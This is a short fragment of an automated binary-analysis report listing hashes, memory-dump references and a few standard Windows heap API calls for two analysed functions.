                                                                                                                                                                                                            • Opcode ID: d1580bcb031b66bd2b2213683ecadffec105f14ca9b64bbfe272fea829f41f0b
                                                                                                                                                                                                            • Instruction ID: 9214d891afc8c2011d47c8a6cb7af97f8f8a0290d7915e91daf54fec394dd846
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d1580bcb031b66bd2b2213683ecadffec105f14ca9b64bbfe272fea829f41f0b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 71E0EC32A4122877D6A06AB66C08F8BBF6CEF95BA1F458411F719A72409B719414CBF0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,6F9890B0,02BC0C69), ref: 02BC41BE
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BC41C1
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC41CE
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC41D1
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1670920773-0
                                                                                                                                                                                                            • Opcode ID: 91e25dc496201b27eb70cab3445351a74c1a7bf33ef9004fed8fa2204f095916
                                                                                                                                                                                                            • Instruction ID: c121b3c2c30e2091ef8fb5d10c05e767b97d1b8314dd3e044456e777fc6c2387
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 91e25dc496201b27eb70cab3445351a74c1a7bf33ef9004fed8fa2204f095916
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A2D05261A82210A2DAB027B66C0CF1B6E2CEB90A92F924804BA45A3580CA2080608AB0